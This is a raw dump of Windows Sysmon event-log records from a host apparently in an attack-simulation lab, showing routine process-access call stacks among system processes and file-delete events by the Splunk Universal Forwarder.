07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.654{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|
C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.654{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x80000000000000001048515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E7301BC97D3D7C00A0B8293A848780,SHA256=816C70DF5D8EB4EF8F0D028879F3C58D9D84A2270A8697E54FDD1B3BB36F4392,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77A403A6402C6B4C6279D778C166CA4C,SHA256=C2F3C734DED9186BCFD92D7A8FB346E74AAACC42E20C939A06485E4D342D1ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF3E0A41BDD2D3E5E45CC29E7977866E,SHA256=B9EC79CA7B742C94D0090A7E032E15FF115C13C8012733773C7CFB2914B0D643,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4